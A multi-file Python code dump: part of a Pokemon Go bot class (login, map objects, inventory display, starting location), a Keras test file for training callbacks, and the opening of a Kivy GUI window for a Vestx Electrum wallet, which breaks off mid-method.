timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not self.is_numeric(self.api._auth_provider._ticket_expire):
self.logger.info("Ticket expired value is not numeric", 'yellow')
return
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
while not self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password)):
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login error, server busy. Waiting 10 seconds to try again."
)
time.sleep(10)
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
while True:
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
break
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
break
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'encrypt_64.dll'
else:
file_name = 'encrypt.dll'
else:
file_name = 'encrypt.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set encrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.activate_signature(self.get_encryption_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
self.config.username)) as f:
location_json = json.load(f)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.call()
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
inventory_items = self.api.get_inventory()
inventory_items = inventory_items['responses']['GET_INVENTORY']['inventory_delta']['inventory_items']
player_stats = next((x["inventory_item_data"]["player_stats"]
for x in inventory_items
if x.get("inventory_item_data", {}).get("player_stats", {})),
None)
if player_stats:
nextlvlxp = (int(player_stats.get('next_level_xp', 0)) - int(player_stats.get('experience', 0)))
if 'level' in player_stats and 'experience' in player_stats:
self.logger.info(
'Level: {level}'.format(
**player_stats) +
' (Next Level: {} XP)'.format(
nextlvlxp) +
' (Total: {experience} XP)'
''.format(**player_stats))
if 'pokemons_captured' in player_stats and 'poke_stop_visits' in player_stats:
self.logger.info(
'Pokemon Captured: '
'{pokemons_captured}'.format(
**player_stats) +
' | Pokestops Visited: '
'{poke_stop_visits}'.format(
**player_stats))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
|
test_callbacks.py
|
import os
import sys
import multiprocessing
import numpy as np
import pytest
from csv import Sniffer
from keras import optimizers
np.random.seed(1337)
from keras import callbacks
from keras.models import Sequential
from keras.layers.core import Dense
from keras.utils.test_utils import get_test_data
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
nb_hidden = 4
nb_class = 2
batch_size = 5
train_samples = 20
test_samples = 20
def test_ModelCheckpoint():
filepath = 'checkpoint.h5'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=4)
assert os.path.exists(filepath.format(epoch=1))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=2))
os.remove(filepath.format(epoch=1))
os.remove(filepath.format(epoch=3))
def test_EarlyStopping():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=20)
def test_EarlyStopping_reuse():
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
def test_LearningRateScheduler():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
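    # The schedule sets the lr for epoch index x to 1 / (1 + x); after 5 epochs the last value
    # applied is 1 / (1 + 4) = 0.2, which the assertion below checks.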
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
    assert abs(float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
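    # The initial lr is 0.1, so a single reduction by factor 0.1 should leave it at 0.1 * 0.1 = 0.01.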
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
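    # With epsilon=0 the ordinary epoch-to-epoch improvement counts as progress, so no reduction
    # is expected and the lr should remain at 0.1.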
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_CSVLogger():
filepath = 'log.tsv'
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=1)
import re
with open(filepath) as csvfile:
output = " ".join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(
nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
def data_generator_graph(train):
while 1:
if train:
yield {'X_vars': X_train, 'output': y_train}
else:
yield {'X_vars': X_test, 'output': y_test}
# case 1 Sequential
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation data
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit generator with validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
def test_LambdaCallback():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
p.join()
assert not p.is_alive()
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
if __name__ == '__main__':
pytest.main([__file__])
|
main_window.py
|
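# Kivy application / main window for the Vestx Electrum wallet GUI.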
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum_vestx.bitcoin import TYPE_ADDRESS
from electrum_vestx.storage import WalletStorage
from electrum_vestx.wallet import Wallet, InternalAddressCorruption
from electrum_vestx.paymentrequest import InvoiceStore
from electrum_vestx.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_vestx.plugin import run_hook
from electrum_vestx.util import format_satoshis, format_satoshis_plain
from electrum_vestx.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_vestx import blockchain
from electrum_vestx.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
Window.size = (1080, 1920)
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_vestx.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_vestx.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_vestx.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_vestx.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; timeout=0 keeps the
# cached data forever.
Cache.register('electrum_vestx_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_vestx.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Montserrat',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Regular.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Regular.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Bold.otf',
'electrum_vestx/gui/kivy/data/fonts/Montserrat-Bold.otf')
Label.register('Roboto',
'electrum_vestx/gui/kivy/data/fonts/Roboto.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_vestx/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_vestx.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on, True)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_vestx import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
